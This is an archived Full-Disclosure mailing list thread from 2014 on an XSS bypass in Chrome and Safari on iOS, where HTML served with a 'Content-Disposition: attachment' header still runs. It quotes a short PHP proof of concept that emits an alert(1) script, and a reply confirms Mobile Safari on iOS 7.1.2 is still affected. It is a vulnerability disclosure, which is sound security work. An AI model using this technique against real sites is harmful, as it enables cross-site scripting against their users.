lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <53D924E8.2040409@securify.nl>
Date: Wed, 30 Jul 2014 19:01:28 +0200
From: "Securify B.V." <lists@...urify.nl>
To: fulldisclosure@...lists.org
Subject: Re: [FD] Bypassing Content-Disposition: attachment for XSS on
 Chrome/Safari(IOS 6.x)

This issue was originally reported as CVE-2011-3426. We can confirm that 
Mobile Safari on iOS 7.1.2 is still affected. We've reported this to 
Apple on February 25, 2014. You can test is yourself at:
http://www.securify.nl/cve-2011-3426.html

This test page sets the following HTTP headers:

Content-Disposition: attachment;filename=cve-2011-3426.html
Content-Type: application/octet-stream

With kind regards,

Yorick


On di, 2014-07-29 at 15:56 +0800, heige wrote:
 >
 > > > Bypassing Content-Disposition: attachment for XSS on 
Chrome/Safari(IOS)
 > > >
 > > > by Superhei of KnownSec team (www.knownsec.com) 2013.6.3
 > > >
 > > > Test Environment
 > > > ipad(ios 6.1.3)
 > > > Chrome(26.0.1410.53)
 > > >
 > > > This code is downloader for attachment which is a HTML file.
 > > >
 > > > <?php
 > > > //down.php
 > > > header("Content-Type:text/plain");
 > > > //header("Content-Type:text/html");
 > > > header("Content-Disposition: attachment; filename=\"test.html\"");
 > > > echo "<html><script>alert(1)</script></html>";
 > > > ?>
 > > >
 > > > On IOS , when Chrome/Safari visit the down.php, the HTML code 
will be running.Ofcourse, including the javascript and led to cross-site 
scripting attacks.
 > > >
 > >
 > from http://www.80vul.com/apple.txt

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ